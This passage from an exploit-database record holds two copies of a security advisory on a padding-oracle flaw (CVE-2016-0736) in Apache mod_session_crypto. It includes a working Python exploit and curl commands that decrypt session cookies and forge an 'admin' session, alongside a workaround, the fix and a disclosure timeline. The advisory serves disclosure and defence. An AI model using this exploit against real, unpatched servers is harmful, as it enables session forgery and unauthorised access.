again:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThis verifies the existence of the Padding Oracle vulnerability. The\r\nPython library[1] python-paddingoracle was then used to implement\r\ndecrypting the session by exploiting the Padding Oracle vulnerability.\r\n\r\nexploit.py\r\n------------------------------------------------------------------------\r\nfrom paddingoracle import BadPaddingException, PaddingOracle\r\nfrom base64 import b64encode, b64decode\r\nimport requests\r\n\r\nclass PadBuster(PaddingOracle):\r\n def __init__(self, valid_cookie, **kwargs):\r\n super(PadBuster, self).__init__(**kwargs)\r\n self.wait = kwargs.get('wait', 2.0)\r\n self.valid_cookie = valid_cookie\r\n\r\n def oracle(self, data, **kwargs):\r\n v = b64encode(self.valid_cookie+data)\r\n\r\n response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',\r\n cookies=dict(session=v), stream=False, timeout=5, verify=False)\r\n\r\n if 'username' in response.content:\r\n logging.debug('No padding exception raised on %r', v)\r\n return\r\n\r\n raise BadPaddingException\r\n\r\nif __name__ == '__main__':\r\n import logging\r\n import sys\r\n\r\n if not sys.argv[2:]:\r\n print 'Usage: [encrypt|decrypt] <session value> <plaintext>'\r\n sys.exit(1)\r\n\r\n logging.basicConfig(level=logging.WARN)\r\n mode = sys.argv[1]\r\n session = b64decode(sys.argv[2])\r\n padbuster = PadBuster(session)\r\n\r\n if mode == \"decrypt\":\r\n cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])\r\n print('Decrypted session:\\n%r' % cookie)\r\n elif mode == \"encrypt\":\r\n key = session[0:16]\r\n plaintext = sys.argv[3]\r\n\r\n s = padbuster.encrypt(plaintext, block_size=16)\r\n\r\n data = b64encode(key+s[0:len(s)-16])\r\n print('Encrypted session:\\n%s' % data)\r\n else:\r\n print \"invalid mode\"\r\n sys.exit(1)\r\n------------------------------------------------------------------------\r\n\r\nThis Python script can then be used to decrypt the session:\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=\r\nDecrypted session:\r\nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r'\r\n\r\nreal 6m43.088s\r\nuser 0m15.464s\r\nsys 0m0.976s\r\n------------------------------------------------------------------------\r\n\r\nIn this sample application, the username and a timestamp are included in\r\nthe session data. The Python script can also be used to encrypt a new\r\nsession containing the username \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\\r\nRU= username=admin\r\n\r\nEncrypted session:\r\nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY\r\n\r\nreal3m38.002s\r\nusers0m8.536s\r\nsys0m0.512s\r\n\r\n------------------------------------------------------------------------\r\n\r\nSending this newly encrypted session to the server shows that the\r\nusername is now \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\\r\nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is admin\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nUse a different means to store the session, e.g. in a database by using\r\nmod_session_dbd.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to Apache HTTP version 2.4.25 (see [2]).\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nApplications which use mod_session_crypto usually store sensitive values\r\nin the session and rely on an attacker's inability to decrypt or modify\r\nthe session. Successful exploitation of the Padding Oracle vulnerability\r\nsubverts this mechanism and allows to construct sessions with arbitrary\r\nattacker-specified content. Depending on the application this may\r\ncompletely subvert the application's security. Therefore, this\r\nvulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2016-01-11 Vulnerability identified\r\n2016-01-12 Customer approved disclosure to vendor\r\n2016-01-12 CVE number requested\r\n2016-01-20 Vendor notified\r\n2016-01-22 Vendor confirmed the vulnerability\r\n2016-02-03 Vendor provided patch\r\n2016-02-04 Apache Security Team assigned CVE number\r\n2016-03-03 Requested status update from vendor, no response\r\n2016-05-02 Requested status update from vendor, no response\r\n2016-07-14 Requested status update and roadmap from vendor\r\n2016-07-21 Vendor confirms working on a new released and inquired whether the\r\n patch fixes the vulnerability\r\n2016-07-22 RedTeam confirms\r\n2016-08-24 Requested status update from vendor\r\n2016-08-29 Vendor states that there is no concrete timeline\r\n2016-12-05 Vendor announces a release\r\n2016-12-20 Vendor released fixed version\r\n2016-12-23 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://github.com/mwielgoszewski/python-paddingoracle\r\n[2] http://httpd.apache.org/security/vulnerabilities_24.html\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/26574", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-23T22:03:13", "description": "", "published": "2016-12-23T00:00:00", "type": "packetstorm", "title": "Apache mod_session_crypt 2.5 Padding Oracle", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "id": "PACKETSTORM:140265", "href": "https://packetstormsecurity.com/files/140265/Apache-mod_session_crypt-2.5-Padding-Oracle.html", "sourceData": "`Advisory: Padding Oracle in Apache mod_session_crypto \n \nDuring a penetration test, RedTeam Pentesting discovered a Padding \nOracle vulnerability in mod_session_crypto of the Apache web server. \nThis vulnerability can be exploited to decrypt the session data and even \nencrypt attacker-specified data. \n \n \nDetails \n======= \n \nProduct: Apache HTTP Server mod_session_crypto \nAffected Versions: 2.3 to 2.5 \nFixed Versions: 2.4.25 \nVulnerability Type: Padding Oracle \nSecurity Risk: high \nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt \nAdvisory Status: published \nCVE: CVE-2016-0736 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736 \n \n \nIntroduction \n============ \n \nThe module mod_session_crypto of the Apache HTTP Server can be used in \nconjunction with the modules mod_session and mod_session_cookie to store \nsession data in an encrypted cookie within the users' browsers. This \navoids server-side session state so that incoming HTTP requests can be \neasily distributed amongst a number of application web servers which do \nnot need to share session state. \n \n \nMore Details \n============ \n \nThe module mod_session_crypto uses symmetric cryptography to encrypt and \ndecrypt session data and uses mod_session to store the encrypted data in \na cookie (usually called \"session\") within the user's browser. The \ndecrypted session is then made available to the application in an \nenvironment variable (in case of a CGI script) or in a custom HTTP \nrequest header. The application can add a custom HTTP response header \n(usually \"X-Replace-Session\") which instructs the HTTP server to replace \nthe session's content with the value of the header. Detailed \ninstructions to set up mod_session and mod_session_crypto can be found \nin the documentation: \nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples \n \nThe module mod_session_crypto is configured to use either 3DES or AES \nwith various key sizes, defaulting to AES256. Encryption is handled by \nthe function \"encrypt_string\": \n \nmodules/session/mod_session_crypto.c \n------------------------------------------------------------------------ \n/** \n* Encrypt the string given as per the current config. \n* \n* Returns APR_SUCCESS if successful. \n*/ \nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, \nsession_crypto_dir_conf *dconf, const char *in, char **out) \n{ \n[...] \napr_crypto_key_t *key = NULL; \n[...] \nconst unsigned char *iv = NULL; \n[...] \n \n/* use a uuid as a salt value, and prepend it to our result */ \napr_uuid_get(&salt); \n \n[...] \n \nres = apr_crypto_passphrase(&key, &ivSize, passphrase, \nstrlen(passphrase), \n(unsigned char *) (&salt), sizeof(apr_uuid_t), \n*cipher, APR_MODE_CBC, 1, 4096, f, r->pool); \n \n[...] \n \nres = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool); \n[...] \nres = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in, \nstrlen(in), block); \n[...] \nres = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block); \n[...] \n \n/* prepend the salt and the iv to the result */ \ncombined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t)); \nmemcpy(combined, &salt, sizeof(apr_uuid_t)); \nmemcpy(combined + sizeof(apr_uuid_t), iv, ivSize); \nmemcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); \n \n/* base64 encode the result */ \nbase64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen + \nsizeof(apr_uuid_t) + 1) \n* sizeof(char)); \n[...] \nreturn res; \n} \n------------------------------------------------------------------------ \n \nThe source code shows that an encryption key is derived from the \nconfigured password and a randomly chosen salt by calling the function \n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive \nthe key. The data is then encrypted and the salt and IV prepended to the \nencrypted data. Before returning to the caller, the result is encoded as \nbase64. \n \nThis procedure does not guarantee integrity of the ciphertext, so the \nApache module is unable to detect whether a session sent back to the \nserver has been tampered with. Depending on the application this often \nmeans that attackers are able to exploit a Padding Oracle vulnerability. \nThis allows decrypting the session and encrypting arbitrary data chosen \nby the attacker. \n \n \nProof of Concept \n================ \n \nThe vulnerability can be reproduced as follows. First, the modules \nmod_session, mod_session_crypto and mod_session_cookie are enabled and \nconfigured: \n \n------------------------------------------------------------------------ \nSession On \nSessionEnv On \nSessionCookieName session path=/ \nSessionHeader X-Replace-Session \nSessionCryptoPassphrase RedTeam \n------------------------------------------------------------------------ \n \nIn addition, CGI scripts are enabled for a folder and the following CGI \nscript is saved as \"status.rb\" and is made available to clients: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env ruby \n \nrequire 'cgi' \n \ncgi = CGI.new \ndata = CGI.parse(ENV['HTTP_SESSION']) \n \nif data.has_key? 'username' \nputs \nputs \"your username is %s\" % data['username'] \nexit \nend \n \nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\") \nputs \nputs \"not logged in\" \n------------------------------------------------------------------------ \n \nOnce the CGI script is correctly set up, the command-line HTTP client curl \ncan be used to access it: \n \n------------------------------------------------------------------------ \n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb \nHTTP/1.1 200 OK \nDate: Tue, 19 Jan 2016 13:23:19 GMT \nServer: Apache/2.4.10 (Ubuntu) \nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ \nl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ \nCache-Control: no-cache \nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ \nl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ \nTransfer-Encoding: chunked \nContent-Type: application/x-ruby \n \nnot logged in \n------------------------------------------------------------------------ \n \nThe example shows that a new encrypted cookie with the name \"session\" is \nreturned, and the response body contains the text \"not logged in\". \nCalling the script again with the cookie just returned reveals that the \nusername in the session is set to \"guest\": \n \n------------------------------------------------------------------------ \n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\ \nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\ \nhttp://127.0.0.1:8080/cgi-bin/status.rb \n \nyour username is guest \n------------------------------------------------------------------------ \n \nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate \nthe padding at the end of the ciphertext, so the session cannot be \ndecrypted correctly and is therefore not passed to the CGI script, which \nreturns the text \"not logged in\" again: \n \n------------------------------------------------------------------------ \n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\ \nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\ \nhttp://127.0.0.1:8080/cgi-bin/status.rb \n \nnot logged in \n------------------------------------------------------------------------ \n \nThis verifies the existence of the Padding Oracle vulnerability. The \nPython library[1] python-paddingoracle was then used to implement \ndecrypting the session by exploiting the Padding Oracle vulnerability. \n \nexploit.py \n------------------------------------------------------------------------ \nfrom paddingoracle import BadPaddingException, PaddingOracle \nfrom base64 import b64encode, b64decode \nimport requests \n \nclass PadBuster(PaddingOracle): \ndef __init__(self, valid_cookie, **kwargs): \nsuper(PadBuster, self).__init__(**kwargs) \nself.wait = kwargs.get('wait', 2.0) \nself.valid_cookie = valid_cookie \n \ndef oracle(self, data, **kwargs): \nv = b64encode(self.valid_cookie+data) \n \nresponse = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb', \ncookies=dict(session=v), stream=False, timeout=5, verify=False) \n \nif 'username' in response.content: \nlogging.debug('No padding exception raised on %r', v) \nreturn \n \nraise BadPaddingException \n \nif __name__ == '__main__': \nimport logging \nimport sys \n \nif not sys.argv[2:]: \nprint 'Usage: [encrypt|decrypt] <session value> <plaintext>' \nsys.exit(1) \n \nlogging.basicConfig(level=logging.WARN) \nmode = sys.argv[1] \nsession = b64decode(sys.argv[2]) \npadbuster = PadBuster(session) \n \nif mode == \"decrypt\": \ncookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32]) \nprint('Decrypted session:\\n%r' % cookie) \nelif mode == \"encrypt\": \nkey = session[0:16] \nplaintext = sys.argv[3] \n \ns = padbuster.encrypt(plaintext, block_size=16) \n \ndata = b64encode(key+s[0:len(s)-16]) \nprint('Encrypted session:\\n%s' % data) \nelse: \nprint \"invalid mode\" \nsys.exit(1) \n------------------------------------------------------------------------ \n \nThis Python script can then be used to decrypt the session: \n \n------------------------------------------------------------------------ \n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\ \nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \nDecrypted session: \nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r' \n \nreal 6m43.088s \nuser 0m15.464s \nsys 0m0.976s \n------------------------------------------------------------------------ \n \nIn this sample application, the username and a timestamp are included in \nthe session data. The Python script can also be used to encrypt a new \nsession containing the username \"admin\": \n \n------------------------------------------------------------------------ \n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\ \nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\ \nRU= username=admin \n \nEncrypted session: \nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY \n \nreal3m38.002s \nusers0m8.536s \nsys0m0.512s \n \n------------------------------------------------------------------------ \n \nSending this newly encrypted session to the server shows that the \nusername is now \"admin\": \n \n------------------------------------------------------------------------ \n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\ \nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb \n \nyour username is admin \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nUse a different means to store the session, e.g. in a database by using \nmod_session_dbd. \n \n \nFix \n=== \n \nUpdate to Apache HTTP version 2.4.25 (see [2]). \n \n \nSecurity Risk \n============= \n \nApplications which use mod_session_crypto usually store sensitive values \nin the session and rely on an attacker's inability to decrypt or modify \nthe session. Successful exploitation of the Padding Oracle vulnerability \nsubverts this mechanism and allows to construct sessions with arbitrary \nattacker-specified content. Depending on the application this may \ncompletely subvert the application's security. Therefore, this \nvulnerability poses a high risk. \n \n \nTimeline \n======== \n \n2016-01-11 Vulnerability identified \n2016-01-12 Customer approved disclosure to vendor \n2016-01-12 CVE number requested \n2016-01-20 Vendor notified \n2016-01-22 Vendor confirmed the vulnerability \n2016-02-03 Vendor provided patch \n2016-02-04 Apache Security Team assigned CVE number \n2016-03-03 Requested status update from vendor, no response \n2016-05-02 Requested status update from vendor, no response \n2016-07-14 Requested status update and roadmap from vendor \n2016-07-21 Vendor confirms working on a new released and inquired whether the \npatch fixes the vulnerability \n2016-07-22 RedTeam confirms \n2016-08-24 Requested status update from vendor \n2016-08-29 Vendor states that there is no concrete timeline \n2016-12-05 Vendor announces a release \n2016-12-20 Vendor released fixed version \n2016-12-23 Advisory released \n \n \nReferences \n========== \n \n[1] https://github.com/mwielgoszewski/python-paddingoracle \n[2] http://httpd.apache.org/security/vulnerabilities_24.html \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGeschaftsfuhrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140265/rt-sa-2016-001.txt"}]}